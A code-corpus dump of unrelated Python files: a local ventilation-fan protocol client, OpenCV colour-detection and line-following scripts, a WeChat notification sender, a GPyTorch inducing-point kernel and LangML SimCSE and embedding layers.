payload = self.HEADER + payload + self.chksum(payload)
return self.socket.sendall(bytes.fromhex(payload))
def receive(self):
try:
response = self.socket.recv(4096)
return response
except socket.timeout:
return None
def do_func(self, func, param, value=""):
out = ""
parameter = ""
for i in range(0, len(param), 4):
n_out = ""
out = param[i : (i + 4)]
if out == "0077" and value == "":
value = "0101"
if value != "":
val_bytes = int(len(value) / 2)
else:
val_bytes = 0
if out[:2] != "00":
n_out = "ff" + out[:2]
if val_bytes > 1:
n_out += "fe" + hex(val_bytes).replace("0x", "").zfill(2) + out[2:4]
else:
n_out += out[2:4]
parameter += n_out + value
if out == "0077":
value = ""
data = func + parameter
self.send(data)
response = self.receive()
if response:
self.parse_response(response)
self.socket.close()
def update(self):
request = ""
for param in self.params:
request += hex(param).replace("0x", "").zfill(4)
self.do_func(self.func["read"], request)
def set_param(self, param, value):
valpar = self.get_params_values(param, value)
if valpar[0] != None:
if valpar[1] != None:
self.do_func(
self.func["write_return"],
hex(valpar[0]).replace("0x", "").zfill(4),
hex(valpar[1]).replace("0x", "").zfill(2),
)
else:
self.do_func(
self.func["write_return"],
hex(valpar[0]).replace("0x", "").zfill(4),
value,
)
def get_param(self, param):
idx = self.get_params_index(param)
if idx != None:
self.do_func(self.func["read"], hex(idx).replace("0x", "").zfill(4))
# def set_state_on(self):
def turn_on_ventilation(self):
request = "0001"
value = "01"
if self.state == "off":
self.do_func(self.func["write_return"], request, value)
# def set_state_off(self):
def turn_off_ventilation(self):
request = "0001"
value = "00"
if self.state == "on":
self.do_func(self.func["write_return"], request, value)
def set_speed(self, speed: int):
if speed >= 1 and speed <= 3:
request = "0002"
value = hex(speed).replace("0x", "").zfill(2)
self.do_func(self.func["write_return"], request, value)
def set_man_speed_percent(self, speed: int):
if speed >= 2 and speed <= 100:
request = "0044"
value = math.ceil(255 / 100 * speed)
value = hex(value).replace("0x", "").zfill(2)
self.do_func(self.func["write_return"], request, value)
request = "0002"
value = "ff"
self.do_func(self.func["write_return"], request, value)
def set_man_speed(self, speed):
if speed >= 14 and speed <= 255:
request = "0044"
value = speed
value = hex(value).replace("0x", "").zfill(2)
self.do_func(self.func["write_return"], request, value)
request = "0002"
value = "ff"
self.do_func(self.func["write_return"], request, value)
def set_airflow(self, val):
if val >= 0 and val <= 2:
request = "00b7"
value = hex(val).replace("0x", "").zfill(2)
self.do_func(self.func["write_return"], request, value)
def parse_response(self, data):
pointer = 20
# discard header bytes
length = len(data) - 2
pwd_size = data[pointer]
pointer += 1
password = data[pointer:pwd_size]
pointer += pwd_size
function = data[pointer]
pointer += 1
# from here parsing of parameters begin
payload = data[pointer:length]
response = bytearray()
ext_function = 0
value_counter = 1
high_byte_value = 0
parameter = 1
for p in payload:
if parameter and p == 0xFF:
ext_function = 0xFF
# print ( "def ext:" + hex(0xff) )
elif parameter and p == 0xFE:
ext_function = 0xFE
# print ( "def ext:" + hex(0xfe) )
elif parameter and p == 0xFD:
ext_function = 0xFD
# print ( "dev ext:" + hex(0xfd) )
else:
if ext_function == 0xFF:
high_byte_value = p
ext_function = 1
elif ext_function == 0xFE:
value_counter = p
ext_function = 2
elif ext_function == 0xFD:
None
else:
if parameter == 1:
# print ("appending: " + hex(high_byte_value))
response.append(high_byte_value)
parameter = 0
else:
value_counter -= 1
response.append(p)
if value_counter <= 0:
parameter = 1
value_counter = 1
high_byte_value = 0
setattr(
self,
self.params[int(response[:2].hex(), 16)][0],
response[2:].hex(),
)
response = bytearray()
@property
def name(self):
return self._name
@property
def host(self):
return self._host
@host.setter
def host(self, ip):
try:
socket.inet_aton(ip)
self._host = ip
except socket.error:
sys.exit()
@property
def id(self):
return self._id
@id.setter
def id(self, id):
self._id = id
@property
def password(self):
return self._password
@password.setter
def password(self, pwd):
self._password = <PASSWORD>
@property
def port(self):
return self._port
@property
def state(self):
return self._state
@state.setter
def state(self, val):
self._state = self.states[int(val)]
@property
def speed(self):
return self._speed
@speed.setter
def speed(self, input):
val = int(input, 16)
self._speed = self.speeds[val]
@property
def boost_status(self):
return self._boost_status
@boost_status.setter
def boost_status(self, input):
val = int(input, 16)
self._boost_status = self.statuses[val]
@property
def timer_mode(self):
return self._timer_mode
@timer_mode.setter
def timer_mode(self, input):
val = int(input, 16)
self._timer_mode = self.timer_modes[val]
@property
def timer_counter(self):
return self._timer_counter
@timer_counter.setter
def timer_counter(self, input):
val = int(input, 16).to_bytes(3, "big")
self._timer_counter = (
str(val[2]) + "h " + str(val[1]) + "m " + str(val[0]) + "s "
)
@property
def humidity_sensor_state(self):
return self._humidity_sensor_state
@humidity_sensor_state.setter
def humidity_sensor_state(self, input):
val = int(input, 16)
self._humidity_sensor_state = self.states[val]
@property
def relay_sensor_state(self):
return self._relay_sensor_state
@relay_sensor_state.setter
def relay_sensor_state(self, input):
val = int(input, 16)
self._relay_sensor_state = self.states[val]
@property
def analogV_sensor_state(self):
return self._analogV_sensor_state
@analogV_sensor_state.setter
def analogV_sensor_state(self, input):
val = int(input, 16)
self._analogV_sensor_state = self.states[val]
@property
def humidity_treshold(self):
return self._humidity_treshold
@humidity_treshold.setter
def humidity_treshold(self, input):
val = int(input, 16)
self._humidity_treshold = str(val) + " %"
@property
def battery_voltage(self):
return self._battery_voltage
@battery_voltage.setter
def battery_voltage(self, input):
val = int.from_bytes(
int(input, 16).to_bytes(2, "big"), byteorder="little", signed=False
)
self._battery_voltage = str(val) + " mV"
@property
def humidity(self):
return self._humidity
@humidity.setter
def humidity(self, input):
val = int(input, 16)
self._humidity = str(val) + " %"
@property
def analogV(self):
return self._analogV
@analogV.setter
def analogV(self, input):
val = int(input, 16)
self._analogV = str(val)
@property
def relay_status(self):
return self._relay_status
@relay_status.setter
def relay_status(self, input):
val = int(input, 16)
self._relay_status = self.statuses[val]
@property
def man_speed(self):
return self._man_speed
@man_speed.setter
def man_speed(self, input):
val = int(input, 16)
if val >= 0 and val <= 255:
percentage = int(val / 255 * 100)
self._man_speed = str(percentage) + " %"
# HA implementation
self._attr_percentage = percentage
@property
def fan1_speed(self):
return self._fan1_speed
@fan1_speed.setter
def fan1_speed(self, input):
val = int.from_bytes(
int(input, 16).to_bytes(2, "big"), byteorder="little", signed=False
)
self._fan1_speed = str(val) + " rpm"
@property
def fan2_speed(self):
return self._fan2_speed
@fan2_speed.setter
def fan2_speed(self, input):
val = int.from_bytes(
int(input, 16).to_bytes(2, "big"), byteorder="little", signed=False
)
self._fan2_speed = str(val) + " rpm"
@property
def filter_timer_countdown(self):
return self._filter_timer_countdown
@filter_timer_countdown.setter
def filter_timer_countdown(self, input):
val = int(input, 16).to_bytes(3, "big")
self._filter_timer_countdown = (
str(val[2]) + "d " + str(val[1]) + "h " + str(val[0]) + "m "
)
@property
def boost_time(self):
return self._boost_time
@boost_time.setter
def boost_time(self, input):
val = int(input, 16)
self._boost_time = str(val) + " m"
@property
def rtc_time(self):
return self._rtc_time
@rtc_time.setter
def rtc_time(self, input):
val = int(input, 16).to_bytes(3, "big")
self._rtc_time = str(val[2]) + "h " + str(val[1]) + "m " + str(val[0]) + "s "
@property
def rtc_date(self):
return self._rtc_date
@rtc_date.setter
def rtc_date(self, input):
val = int(input, 16).to_bytes(4, "big")
self._rtc_date = (
str(val[1])
+ " 20"
+ str(val[3])
+ "-"
+ str(val[2]).zfill(2)
+ "-"
+ str(val[0]).zfill(2)
)
@property
def weekly_schedule_state(self):
return self._weekly_schedule_state
@weekly_schedule_state.setter
def weekly_schedule_state(self, val):
self._weekly_schedule_state = self.states[int(val)]
@property
def weekly_schedule_setup(self):
return self._weekly_schedule_setup
@weekly_schedule_setup.setter
def weekly_schedule_setup(self, input):
val = int(input, 16).to_bytes(6, "big")
self._weekly_schedule_setup = (
self.days_of_week[val[0]]
+ "/"
+ str(val[1])
+ ": to "
+ str(val[5])
+ "h "
+ str(val[4])
+ "m "
+ self.speeds[val[2]]
)
@property
def device_search(self):
return self._device_search
@device_search.setter
def device_search(self, val):
self._device_search = self.hex2str(val)
@property
def device_password(self):
return self._device_password
@device_password.setter
def device_password(self, val):
self._device_password = self.hex2str(val)
@property
def machine_hours(self):
return self._machine_hours
@machine_hours.setter
def machine_hours(self, input):
val = int(input, 16).to_bytes(4, "big")
self._machine_hours = (
str(int.from_bytes(val[2:3], "big"))
+ "d "
+ str(val[1])
+ "h "
+ str(val[0])
+ "m "
)
@property
def alarm_status(self):
return self._alarm_status
@alarm_status.setter
def alarm_status(self, input):
val = int(input, 16)
self._alarm_status = self.alarms[val]
@property
def cloud_server_state(self):
return self._cloud_server_state
@cloud_server_state.setter
def cloud_server_state(self, input):
val = int(input, 16)
self._cloud_server_state = self.states[val]
@property
def firmware(self):
return self._firmware
@firmware.setter
def firmware(self, input):
val = int(input, 16).to_bytes(6, "big")
self._firmware = (
str(val[0])
+ "."
+ str(val[1])
+ " "
+ str(int.from_bytes(val[4:6], byteorder="little", signed=False))
+ "-"
+ str(val[3]).zfill(2)
+ "-"
+ str(val[2]).zfill(2)
)
@property
def filter_replacement_status(self):
return self._filter_replacement_status
@filter_replacement_status.setter
def filter_replacement_status(self, input):
val = int(input, 16)
self._filter_replacement_status = self.statuses[val]
@property
def wifi_operation_mode(self):
return self._wifi_operation_mode
@wifi_operation_mode.setter
def wifi_operation_mode(self, input):
val = int(input, 16)
self._wifi_operation_mode = self.wifi_operation_modes[val]
@property
def wifi_name(self):
return self._wifi_name
@wifi_name.setter
def wifi_name(self, input):
self._wifi_name = self.hex2str(input)
@property
def wifi_pasword(self):
return self._wifi_pasword
@wifi_pasword.setter
def wifi_pasword(self, input):
self._wifi_pasword = self.hex2str(input)
@property
def wifi_enc_type(self):
return self._wifi_enc_type
@wifi_enc_type.setter
def wifi_enc_type(self, input):
val = int(input, 16)
self._wifi_enc_type = self.wifi_enc_types[val]
@property
def wifi_freq_chnnel(self):
return self._wifi_freq_chnnel
@wifi_freq_chnnel.setter
def wifi_freq_chnnel(self, input):
val = int(input, 16)
self._wifi_freq_chnnel = str(val)
@property
def wifi_dhcp(self):
return self._wifi_dhcp
@wifi_dhcp.setter
def wifi_dhcp(self, input):
val = int(input, 16)
self._wifi_dhcp = self.wifi_dhcps[val]
@property
def wifi_assigned_ip(self):
return self._wifi_assigned_ip
@wifi_assigned_ip.setter
def wifi_assigned_ip(self, input):
val = int(input, 16).to_bytes(4, "big")
self._wifi_assigned_ip = (
str(val[0]) + "." + str(val[1]) + "." + str(val[2]) + "." + str(val[3])
)
@property
def wifi_assigned_netmask(self):
return self._wifi_assigned_netmask
@wifi_assigned_netmask.setter
def wifi_assigned_netmask(self, input):
val = int(input, 16).to_bytes(4, "big")
self._wifi_assigned_netmask = (
str(val[0]) + "." + str(val[1]) + "." + str(val[2]) + "." + str(val[3])
)
@property
def wifi_main_gateway(self):
return self._wifi_main_gateway
@wifi_main_gateway.setter
def wifi_main_gateway(self, input):
val = int(input, 16).to_bytes(4, "big")
self._wifi_main_gateway = (
str(val[0]) + "." + str(val[1]) + "." + str(val[2]) + "." + str(val[3])
)
@property
def curent_wifi_ip(self):
return self._curent_wifi_ip
@curent_wifi_ip.setter
def curent_wifi_ip(self, input):
val = int(input, 16).to_bytes(4, "big")
self._curent_wifi_ip = (
str(val[0]) + "." + str(val[1]) + "." + str(val[2]) + "." + str(val[3])
)
@property
def airflow(self):
return self._airflow
@airflow.setter
def airflow(self, input):
val = int(input, 16)
self._airflow = self.airflows[val]
@property
def analogV_treshold(self):
return self._analogV_treshold
@analogV_treshold.setter
def analogV_treshold(self, input):
val = int(input, 16)
self._analogV_treshold = str(val) + " %"
@property
def unit_type(self):
return self._unit_type
@unit_type.setter
def unit_type(self, input):
val = int(input, 16)
self._unit_type = self.unit_types[val]
@property
def night_mode_timer(self):
return self._night_mode_timer
@night_mode_timer.setter
def night_mode_timer(self, input):
val = int(input, 16).to_bytes(2, "big")
self._night_mode_timer = (
str(val[1]).zfill(2) + "h " + str(val[0]).zfill(2) + "m"
)
@property
def party_mode_timer(self):
return self._party_mode_timer
@party_mode_timer.setter
def party_mode_timer(self, input):
val = int(input, 16).to_bytes(2, "big")
self._party_mode_timer = (
str(val[1]).zfill(2) + "h " + str(val[0]).zfill(2) + "m"
)
@property
def humidity_status(self):
return self._humidity_status
@humidity_status.setter
def humidity_status(self, input):
val = int(input, 16)
self._humidity_status = self.statuses[val]
@property
def analogV_status(self):
return self._analogV_status
@analogV_status.setter
def analogV_status(self, input):
val = int(input, 16)
self._analogV_status = self.statuses[val]
``` |
{
"source": "49paunilay/OpenCV_Using_Python_For_Absolute_Beginners",
"score": 3
} |
#### File: 49paunilay/OpenCV_Using_Python_For_Absolute_Beginners/colourdetection.py
```python
import cv2
import numpy as np
location ="Resources/a.jpg"
def empty(i):
pass
cv2.namedWindow("Trackbar")
cv2.resizeWindow("Trackbar",640,240)
cv2.createTrackbar("min Hue","Trackbar",0,179,empty)
cv2.createTrackbar("max Hue","Trackbar",179,179,empty)
cv2.createTrackbar("saturation Min","Trackbar",0,255,empty)
cv2.createTrackbar("saturation Max","Trackbar",255,255,empty)
cv2.createTrackbar("Value min","Trackbar",0,255,empty)
cv2.createTrackbar("value max","Trackbar",255,255,empty)
while True:
image=cv2.imread(location)
imagehsv=cv2.cvtColor(image,cv2.COLOR_BGR2HSV)
hminimum =cv2.getTrackbarPos("min Hue","Trackbar")
hmaximum =cv2.getTrackbarPos("max Hue","Trackbar")
saturation_minimum =cv2.getTrackbarPos("saturation Min","Trackbar")
saturation_Maximum = cv2.getTrackbarPos("saturation Max","Trackbar")
value_minimum = cv2.getTrackbarPos("Value min","Trackbar")
value_Maximum = cv2.getTrackbarPos("value max","Trackbar")
#5print(hminimum,hmaximum,saturation_minimum,saturation_Maximum,value_minimum,value_Maximum)
lower = np.array([hminimum,saturation_minimum,value_minimum])
upper = np.array([hmaximum,saturation_Maximum,value_Maximum])
mask = cv2.inRange(imagehsv,lower,upper)
resultImage = cv2.bitwise_and(image,image,mask=mask)
cv2.imshow("image",resultImage)
cv2.waitKey(1)
``` |
{
"source": "4a5g0030/color_distinguish",
"score": 3
} |
#### File: 4a5g0030/color_distinguish/main.py
```python
import cv2
import mark_color as mc
import sys
def main():
cap = cv2.VideoCapture(0)
cap.set(3, 1280)
cap.set(4, 720)
color = 0
while True:
ret, frame = cap.read()
frame = cv2.flip(frame, 1)
frame = cv2.GaussianBlur(frame, (5, 5), 1.5)
frame, color_box = mc.mark_color(frame, 72000)
if color is 0:
if color_box[1] is not 0:
color = 1
if color_box[2] is not 0:
color = 2
cv2.imshow('frame', frame)
p = 'R : ' + str(color_box[0]) + ', G : ' + str(color_box[1]) + ', B : ' + str(
color_box[2]) + " , Lock Color :" + str(color)
if color_box[color] is not 0:
p += " ON"
elif color_box[0] is not 0:
p += " OFF"
sys.stdout.write('\r' + p)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
def t_one():
img = cv2.imread('test_data/RGB.png')
img = mc.mark_color(img, 30)
cv2.imshow('img', img)
cv2.waitKey(0)
def t_tow():
img = cv2.imread('test_data/test_myroom.jpg')
img = mc.mark_color(img, )
cv2.imshow('img', img)
cv2.waitKey(0)
if __name__ == '__main__':
main()
``` |
{
"source": "4a5g0030/ct_findcontours",
"score": 3
} |
#### File: ct_findcontours/src/main.py
```python
import cv2
import os
import json
ROOT_DIR = os.path.join("../")
IMG_DIR = os.path.join(ROOT_DIR, "Images")
JSON_DIR = os.path.join(ROOT_DIR, "Json")
TH_OUT = os.path.join(ROOT_DIR, "th_out")
def find_c(image, filename):
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
_, th = cv2.threshold(gray, 70, 255, cv2.THRESH_BINARY)
contours, _ = cv2.findContours(th, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
image = cv2.drawContours(image, contours, -1, (0, 255, 0), 3)
cv2.imwrite(os.path.join(TH_OUT, filename), th)
return image, contours
def main():
image_list = os.listdir(IMG_DIR)
jsonfilename = image_list[0].strip(".jpg") + "to" +image_list[len(image_list)-1].strip(".jpg") + ".json"
json_open = open(os.path.join(JSON_DIR, jsonfilename), 'w')
json_open.write("{\n}")
json_open.close()
json_file = open(os.path.join(JSON_DIR, jsonfilename), 'r')
json_file_data = json_file.read()
data = json.loads(json_file_data)
for file in image_list:
img = cv2.imread(os.path.join(IMG_DIR, file))
img, contours = find_c(img, file)
for n in range(0, len(contours)):
list_x = []
list_y = []
for point in contours[n]:
for x, y in point:
list_x.append(x)
list_y.append(y)
data[file] = {}
data[file]['all_points_x'] = list_x
data[file]['all_points_y'] = list_y
with open(os.path.join(JSON_DIR, jsonfilename), "w") as file_write:
json.dump(data, file_write, default=int)
if __name__ == '__main__':
main()
``` |
{
"source": "4a5g0030/line_follow_p2",
"score": 3
} |
#### File: 4a5g0030/line_follow_p2/line_follow.py
```python
import cv2
import numpy as np
from ShowProcess import ShowProcess
import glob
import time
import matplotlib.pyplot as plt
plt.figure()
def func_time(func):
def ft():
s = time.time()
func()
e = time.time()
print('use time :', e - s)
return ft()
def get_contour_center(contour):
m = cv2.moments(contour)
if m["m00"] == 0:
return [0, 0]
x = int(m["m10"] / m["m00"])
y = int(m["m01"] / m["m00"])
return [x, y]
def process(image):
_, thresh = cv2.threshold(
image, 125, 255, cv2.THRESH_BINARY_INV)
contours, _ = cv2.findContours(
thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
if contours:
main_contour = max(contours, key=cv2.contourArea)
cv2.drawContours(image, [main_contour], -1, (150, 150, 150), 2)
contour_center = get_contour_center(main_contour)
cv2.circle(image, tuple(contour_center), 2, (150, 150, 150), 2)
return image, contour_center
else:
return image, (0, 0)
def slice_out(im, num):
cont_cent = list()
height, width = im.shape[:2]
sl = int(height / num)
sliced_imgs = list()
for i in range(num):
part = sl * i
crop_img = im[part:part + sl, 0:width]
processed = process(crop_img)
plt.subplot2grid((4, 4), (i, 2), colspan=2, rowspan=1)
plt.axis('off')
plt.imshow(processed[0], cmap="gray")
plt.title(str(i) + ", " + str(processed[1]))
sliced_imgs.append(processed[0])
cont_cent.append(processed[1])
return sliced_imgs, cont_cent
def repack(images):
im = images[0]
for i in range(len(images)):
if i == 0:
im = np.concatenate((im, images[1]), axis=0)
if i > 1:
im = np.concatenate((im, images[i]), axis=0)
return im
@func_time
def main():
img_in_root = 'test_data/image/'
img_out_root = 'test_data/pltoutput/'
img_count = len(glob.glob(img_in_root + '*jpg'))
process_bar = ShowProcess(img_count, 'OK!')
no_slice = 4
for x in range(img_count):
img = cv2.imread(img_in_root + str(x).zfill(3) + '.jpg')
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
plt.subplot2grid((4, 4), (0, 0), colspan=2, rowspan=2)
plt.axis('off')
plt.imshow(img, cmap="gray")
plt.title("Gray")
slices, cont_cent = slice_out(img, no_slice)
img = repack(slices)
plt.subplot2grid((4, 4), (2, 0), colspan=2, rowspan=2)
plt.axis('off')
plt.imshow(img, cmap='gray')
plt.title("Finish")
plt.savefig(img_out_root + str(x).zfill(3) + '.jpg')
# cv2.imwrite(img_out_root + str(x).zfill(3) + '.jpg', img)
process_bar.show_process()
if __name__ == '__main__':
main
``` |
{
"source": "4admin2root/devopssec",
"score": 3
} |
#### File: media/weixin/weixin_send.py
```python
import urllib,urllib2
import json
import sys
reload(sys)
sys.setdefaultencoding('utf8')
def gettoken():
CropID='wwdae'
Secret='<KEY>'
URL="https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid="+CropID+"&corpsecret="+Secret
token_file = urllib2.urlopen(URL)
token_data = token_file.read().decode('utf-8')
token_json = json.loads(token_data)
token_json.keys()
return token_json['access_token']
def sendmsg(access_token,username,content):
URL="https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token="+access_token
send_values = {
"touser":username,
"msgtype":"text",
"agentid":1000024,
"text":{
"content":content
}
}
send_data = json.dumps(send_values, ensure_ascii=False)
send_request = urllib2.Request(URL, send_data)
urllib2.urlopen(send_request)
if __name__ == '__main__':
username = str(sys.argv[1])
content = str(sys.argv[3])
f = open('/tmp/weixin.log','a')
f.write(str(sys.argv[1:]))
f.close()
accesstoken = gettoken()
sendmsg(accesstoken,username,content)
``` |
{
"source": "4aHxKzD/gpytorch",
"score": 2
} |
#### File: gpytorch/kernels/inducing_point_kernel.py
```python
import copy
import math
import torch
from ..distributions import MultivariateNormal
from ..lazy import DiagLazyTensor, LowRankRootAddedDiagLazyTensor, LowRankRootLazyTensor, MatmulLazyTensor, delazify
from ..mlls import InducingPointKernelAddedLossTerm
from ..models import exact_prediction_strategies
from ..utils.cholesky import psd_safe_cholesky
from .kernel import Kernel
class InducingPointKernel(Kernel):
def __init__(self, base_kernel, inducing_points, likelihood, active_dims=None):
super(InducingPointKernel, self).__init__(active_dims=active_dims)
self.base_kernel = base_kernel
self.likelihood = likelihood
if inducing_points.ndimension() == 1:
inducing_points = inducing_points.unsqueeze(-1)
self.register_parameter(name="inducing_points", parameter=torch.nn.Parameter(inducing_points))
self.register_added_loss_term("inducing_point_loss_term")
def _clear_cache(self):
if hasattr(self, "_cached_kernel_mat"):
del self._cached_kernel_mat
@property
def _inducing_mat(self):
if not self.training and hasattr(self, "_cached_kernel_mat"):
return self._cached_kernel_mat
else:
res = delazify(self.base_kernel(self.inducing_points, self.inducing_points))
if not self.training:
self._cached_kernel_mat = res
return res
@property
def _inducing_inv_root(self):
if not self.training and hasattr(self, "_cached_kernel_inv_root"):
return self._cached_kernel_inv_root
else:
chol = psd_safe_cholesky(self._inducing_mat, upper=True)
eye = torch.eye(chol.size(-1), device=chol.device, dtype=chol.dtype)
inv_root = torch.triangular_solve(eye, chol)[0]
res = inv_root
if not self.training:
self._cached_kernel_inv_root = res
return res
def _get_covariance(self, x1, x2):
k_ux1 = delazify(self.base_kernel(x1, self.inducing_points))
if torch.equal(x1, x2):
covar = LowRankRootLazyTensor(k_ux1.matmul(self._inducing_inv_root))
# Diagonal correction for predictive posterior
if not self.training:
correction = (self.base_kernel(x1, x2, diag=True) - covar.diag()).clamp(0, math.inf)
covar = LowRankRootAddedDiagLazyTensor(covar, DiagLazyTensor(correction))
else:
k_ux2 = delazify(self.base_kernel(x2, self.inducing_points))
covar = MatmulLazyTensor(
k_ux1.matmul(self._inducing_inv_root), k_ux2.matmul(self._inducing_inv_root).transpose(-1, -2)
)
return covar
def _covar_diag(self, inputs):
if inputs.ndimension() == 1:
inputs = inputs.unsqueeze(1)
# Get diagonal of covar
covar_diag = delazify(self.base_kernel(inputs, diag=True))
return DiagLazyTensor(covar_diag)
def forward(self, x1, x2, diag=False, **kwargs):
covar = self._get_covariance(x1, x2)
if self.training:
if not torch.equal(x1, x2):
raise RuntimeError("x1 should equal x2 in training mode")
zero_mean = torch.zeros_like(x1.select(-1, 0))
new_added_loss_term = InducingPointKernelAddedLossTerm(
MultivariateNormal(zero_mean, self._covar_diag(x1)),
MultivariateNormal(zero_mean, covar),
self.likelihood,
)
self.update_added_loss_term("inducing_point_loss_term", new_added_loss_term)
if diag:
return covar.diag()
else:
return covar
def num_outputs_per_input(self, x1, x2):
return self.base_kernel.num_outputs_per_input(x1, x2)
def __deepcopy__(self, memo):
replace_inv_root = False
replace_kernel_mat = False
if hasattr(self, "_cached_kernel_inv_root"):
replace_inv_root = True
kernel_inv_root = self._cached_kernel_inv_root
if hasattr(self, "_cached_kernel_mat"):
replace_kernel_mat = True
kernel_mat = self._cached_kernel_mat
cp = self.__class__(
base_kernel=copy.deepcopy(self.base_kernel),
inducing_points=copy.deepcopy(self.inducing_points),
likelihood=self.likelihood,
active_dims=self.active_dims,
)
if replace_inv_root:
cp._cached_kernel_inv_root = kernel_inv_root
if replace_kernel_mat:
cp._cached_kernel_mat = kernel_mat
return cp
def prediction_strategy(self, train_inputs, train_prior_dist, train_labels, likelihood):
# Allow for fast variances
return exact_prediction_strategies.SGPRPredictionStrategy(
train_inputs, train_prior_dist, train_labels, likelihood
)
``` |
{
"source": "4AI/langml",
"score": 3
} |
#### File: langml/langml/activations.py
```python
import math
from langml import keras, K
from langml.tensor_typing import Tensors
def gelu(x: Tensors) -> Tensors:
r""" Gaussian Error Linear Units (GELUs)
https://arxiv.org/abs/1606.08415
$GELU(x) = 0.5x(1 + tanh[\sqrt(2 / \Pi) (x + 0.044715x^3)])$
"""
return 0.5 * x * (1.0 + K.tanh(math.sqrt(2.0 / math.pi) * (x + 0.044715 * x**3)))
def relu2(x: Tensors) -> Tensors:
return K.pow(K.relu(x), 2)
custom_objects = {'gelu': gelu, 'relu2': relu2}
keras.utils.get_custom_objects().update(custom_objects)
```
#### File: contrastive/simcse/model.py
```python
from langml import keras, K, L
from langml.plm import load_albert, load_bert
from langml.baselines import BaselineModel, Parameters
from langml.tensor_typing import Models, Tensors
def simcse_loss(y_true, y_pred):
y_true = K.cast(K.arange(0, K.shape(y_pred)[0]), dtype=K.floatx())
return K.mean(K.sparse_categorical_crossentropy(y_true, y_pred, from_logits=True))
class SimCSE(BaselineModel):
def __init__(self,
config_path: str,
ckpt_path: str,
params: Parameters,
backbone: str = 'roberta'):
self.config_path = config_path
self.ckpt_path = ckpt_path
self.params = params
assert backbone in ['bert', 'roberta', 'albert']
self.backbone = backbone
if backbone == 'albert':
self.load_plm = load_albert
else:
self.load_plm = load_bert
self.get_cls_lambda = L.Lambda(lambda x: x[:, 0], name='cls')
self.get_first_last_avg_lambda = L.Average(name='first-last-avg')
self.get_last_avg_lambda = L.Lambda(lambda x: K.mean(x, axis=1), name='last-avg')
def get_pooling_output(self, model: Models, output_index: int, pooling_strategy: str = 'cls') -> Tensors:
""" get pooling output
Args:
model: keras.Model, BERT model
output_index: int, specify output index of feedforward layer.
pooling_strategy: str, specify pooling strategy from ['cls', 'first-last-avg', 'last-avg'], default `cls`
"""
assert pooling_strategy in ['cls', 'first-last-avg', 'last-avg']
if pooling_strategy == 'cls':
return self.get_cls_lambda(model.output)
outputs, idx = [], 0
if self.backbone == 'albert':
while True:
try:
output = model.get_layer('Transformer-FeedForward-Norm').get_output_at(idx)
outputs.append(output)
idx += 1
except Exception:
break
N = len(outputs)
if output_index == 0:
outputs = outputs[:N // 2]
elif output_index == 1:
outputs = outputs[N // 2:]
else:
while True:
try:
output = model.get_layer(
'Transformer-%d-FeedForward-Norm' % idx
).get_output_at(output_index)
outputs.append(output)
idx += 1
except Exception:
break
if pooling_strategy == 'first-last-avg':
outputs = [
L.Lambda(lambda x: K.mean(x, axis=1))(outputs[0]),
L.Lambda(lambda x: K.mean(x, axis=1))(outputs[-1])
]
output = self.get_first_last_avg_lambda(outputs)
elif pooling_strategy == 'last-avg':
output = self.get_last_avg_lambda(outputs[-1])
else:
raise NotImplementedError
return output
def build_model(self, pooling_strategy: str = 'cls', lazy_restore: bool = False) -> Models:
assert pooling_strategy in ['cls', 'first-last-avg', 'last-avg']
if lazy_restore:
model, bert, restore_bert_weights = self.load_plm(self.config_path, self.ckpt_path, lazy_restore=True)
else:
model, bert = self.load_plm(self.config_path, self.ckpt_path, dropout_rate=self.params.dropout_rate)
augmented_text_in = L.Input(shape=(None, ), name='Input-Augmented-Token')
augmented_segment_in = L.Input(shape=(None, ), name='Input-Augmented-Segment')
augmented_text, augmented_segment = augmented_text_in, augmented_segment_in
augmented_model = bert(inputs=[augmented_text, augmented_segment])
output = self.get_pooling_output(model, 0, pooling_strategy)
augmented_output = self.get_pooling_output(augmented_model, 1, pooling_strategy)
l2_normalize = L.Lambda(lambda x: K.l2_normalize(x, axis=1), name='l2_norm')
similarity = L.Lambda(
lambda x: K.dot(x[0], K.transpose(x[1]) / self.params.temperature),
name='similarity'
)([l2_normalize(output), l2_normalize(augmented_output)])
encoder = keras.Model(inputs=model.input, outputs=[output])
train_model = keras.Model((*model.input, *augmented_model.input), similarity)
train_model.summary()
train_model.compile(keras.optimizers.Adam(self.params.learning_rate),
loss=simcse_loss)
# For distributed training, restoring bert weight after model compiling.
if lazy_restore:
restore_bert_weights(model)
return train_model, encoder
```
#### File: langml/plm/layers.py
```python
from typing import Optional, List, Union
from langml import TF_KERAS
if TF_KERAS:
import tensorflow.keras as keras
import tensorflow.keras.backend as K
import tensorflow.keras.layers as L
else:
import keras
import keras.backend as K
import keras.layers as L
from langml.tensor_typing import Tensors, Initializer, Constraint, Regularizer
class TokenEmbedding(L.Embedding):
@staticmethod
def get_custom_objects() -> dict:
return {'TokenEmbedding': TokenEmbedding}
def compute_mask(self,
inputs: Tensors,
mask: Optional[Tensors] = None) -> List[Union[Tensors, None]]:
return [super(TokenEmbedding, self).compute_mask(inputs, mask), None]
def call(self, inputs: Tensors) -> List[Tensors]:
return [super(TokenEmbedding, self).call(inputs), self.embeddings + 0]
def compute_output_shape(self, input_shape: Tensors) -> List[Tensors]:
return [super(TokenEmbedding, self).compute_output_shape(input_shape), K.int_shape(self.embeddings)]
class EmbeddingMatching(L.Layer):
def __init__(self,
initializer: Initializer = 'zeros',
regularizer: Optional[Regularizer] = None,
constraint: Optional[Constraint] = None,
use_bias: bool = True,
**kwargs):
super(EmbeddingMatching, self).__init__(**kwargs)
self.supports_masking = True
self.initializer = keras.initializers.get(initializer)
self.regularizer = keras.regularizers.get(regularizer)
self.constraint = keras.constraints.get(constraint)
self.use_bias = use_bias
def get_config(self) -> dict:
config = {
'initializer': keras.initializers.serialize(self.initializer),
'regularizer': keras.regularizers.serialize(self.regularizer),
'constraint': keras.constraints.serialize(self.constraint),
}
base_config = super(EmbeddingMatching, self).get_config()
return dict(base_config, **config)
def build(self, input_shape: Tensors):
if self.use_bias:
self.bias = self.add_weight(
shape=(int(input_shape[1][0]), ),
initializer=self.initializer,
regularizer=self.regularizer,
constraint=self.constraint,
name='bias',
)
super(EmbeddingMatching, self).build(input_shape)
